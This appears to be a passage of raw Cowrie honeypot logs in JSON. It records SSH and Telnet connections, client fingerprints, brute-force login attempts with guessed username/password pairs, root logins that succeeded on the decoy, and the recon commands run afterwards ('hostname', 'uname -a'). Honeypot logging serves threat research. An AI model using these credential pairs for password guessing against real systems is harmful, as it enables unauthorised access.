{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"36.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 36.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:15.235572Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37180,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf415a20f35f","protocol":"ssh","message":"New connection: 212.227.235.229:37180 (1.2.3.4:22) [session: bf415a20f35f]","sensor":"my-vps","timestamp":"2025-08-31T03:10:15.236921Z"}
{"eventid":"cowrie.session.closed","duration":"108.2","message":"Connection lost after 108.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:15.528274Z","src_ip":"212.227.235.229","session":"8168c657830d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:16.023360Z","src_ip":"212.227.235.229","session":"bf415a20f35f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:10:16.049133Z","src_ip":"212.227.235.229","session":"bf415a20f35f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50160,"dst_ip":"1.2.3.4","dst_port":22,"session":"7185465e1628","protocol":"ssh","message":"New connection: 212.227.125.160:50160 (1.2.3.4:22) [session: 7185465e1628]","sensor":"my-vps","timestamp":"2025-08-31T03:10:16.786720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:10:16.787554Z","src_ip":"212.227.125.160","session":"7185465e1628"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:10:17.037674Z","src_ip":"212.227.125.160","session":"7185465e1628"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"dell-2023","message":"login attempt [tempusr/dell-2023] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:18.079740Z","src_ip":"212.227.125.160","session":"7185465e1628"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:19.330727Z","src_ip":"212.227.125.160","session":"7185465e1628"}
{"eventid":"cowrie.session.closed","duration":"40.5","message":"Connection lost after 40.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:21.474047Z","src_ip":"212.227.125.160","session":"a2020671b9b4"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345","message":"login attempt [git/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:21.872804Z","src_ip":"212.227.235.229","session":"bf415a20f35f"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:23.587182Z","src_ip":"212.227.235.229","session":"bf415a20f35f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56922,"dst_ip":"1.2.3.4","dst_port":22,"session":"122f0d956bcb","protocol":"ssh","message":"New connection: 41.226.27.251:56922 (1.2.3.4:22) [session: 122f0d956bcb]","sensor":"my-vps","timestamp":"2025-08-31T03:10:28.449224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:28.513928Z","src_ip":"41.226.27.251","session":"122f0d956bcb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:28.517181Z","src_ip":"41.226.27.251","session":"122f0d956bcb"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:28.695096Z","src_ip":"41.226.27.251","session":"122f0d956bcb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:29.942919Z","src_ip":"41.226.27.251","session":"122f0d956bcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38916,"dst_ip":"1.2.3.4","dst_port":22,"session":"9063e04edc6d","protocol":"ssh","message":"New connection: 212.227.125.160:38916 (1.2.3.4:22) [session: 9063e04edc6d]","sensor":"my-vps","timestamp":"2025-08-31T03:10:33.235828Z"}
{"eventid":"cowrie.session.connect","src_ip":"116.47.103.70","src_port":56671,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c3854560a5a","protocol":"telnet","message":"New connection: 116.47.103.70:56671 (1.2.3.4:23) [session: 6c3854560a5a]","sensor":"my-vps","timestamp":"2025-08-31T03:10:34.448719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:34.685161Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:34.686201Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55394,"dst_ip":"1.2.3.4","dst_port":22,"session":"33edf8b8b316","protocol":"ssh","message":"New connection: 212.227.125.160:55394 (1.2.3.4:22) [session: 33edf8b8b316]","sensor":"my-vps","timestamp":"2025-08-31T03:10:36.313855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:36.685278Z","src_ip":"212.227.125.160","session":"33edf8b8b316"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:10:37.502021Z","src_ip":"212.227.125.160","session":"33edf8b8b316"}
{"eventid":"cowrie.login.failed","username":"git","password":"12345","message":"login attempt [git/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:39.488852Z","src_ip":"212.227.125.160","session":"33edf8b8b316"}
{"eventid":"cowrie.login.success","username":"root","password":"impacto32021","message":"login attempt [root/impacto32021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:10:40.461405Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:41.219823Z","src_ip":"212.227.125.160","session":"33edf8b8b316"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:10:43.670439Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T03:10:43.671293Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:44.829731Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:44.830862Z","src_ip":"212.227.125.160","session":"9063e04edc6d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54788,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb39285d9b2","protocol":"ssh","message":"New connection: 41.226.27.251:54788 (1.2.3.4:22) [session: 6eb39285d9b2]","sensor":"my-vps","timestamp":"2025-08-31T03:10:49.082303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:49.083701Z","src_ip":"41.226.27.251","session":"6eb39285d9b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:49.127305Z","src_ip":"41.226.27.251","session":"6eb39285d9b2"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:49.309803Z","src_ip":"41.226.27.251","session":"6eb39285d9b2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:50.589844Z","src_ip":"41.226.27.251","session":"6eb39285d9b2"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":34088,"dst_ip":"1.2.3.4","dst_port":22,"session":"666e8b6a7487","protocol":"ssh","message":"New connection: 201.148.180.50:34088 (1.2.3.4:22) [session: 666e8b6a7487]","sensor":"my-vps","timestamp":"2025-08-31T03:10:51.850712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:53.182687Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:53.183627Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:10:53.412594Z","src_ip":"212.227.235.229","session":"da443791eb56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37410,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfd21a6c0454","protocol":"ssh","message":"New connection: 212.227.235.229:37410 (1.2.3.4:22) [session: cfd21a6c0454]","sensor":"my-vps","timestamp":"2025-08-31T03:10:54.782616Z"}
{"eventid":"cowrie.session.closed","duration":"102.2","message":"Connection lost after 102.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:10:58.922070Z","src_ip":"212.227.235.229","session":"da443791eb56"}
{"eventid":"cowrie.login.success","username":"root","password":"impacto32021","message":"login attempt [root/impacto32021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:10:59.255318Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:10:59.268217Z","src_ip":"212.227.235.229","session":"cfd21a6c0454"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:10:59.270494Z","src_ip":"212.227.235.229","session":"cfd21a6c0454"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:11:02.160305Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T03:11:02.161086Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:03.692686Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:03.693980Z","src_ip":"201.148.180.50","session":"666e8b6a7487"}
{"eventid":"cowrie.session.closed","duration":30.405865907669067,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:11:04.854513Z","src_ip":"116.47.103.70","session":"6c3854560a5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50666,"dst_ip":"1.2.3.4","dst_port":23,"session":"49868ea308e8","protocol":"telnet","message":"New connection: 212.227.235.229:50666 (1.2.3.4:23) [session: 49868ea308e8]","sensor":"my-vps","timestamp":"2025-08-31T03:11:09.351751Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55124,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2b5e87f9e08","protocol":"ssh","message":"New connection: 41.226.27.251:55124 (1.2.3.4:22) [session: f2b5e87f9e08]","sensor":"my-vps","timestamp":"2025-08-31T03:11:09.561020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:11:09.562158Z","src_ip":"41.226.27.251","session":"f2b5e87f9e08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"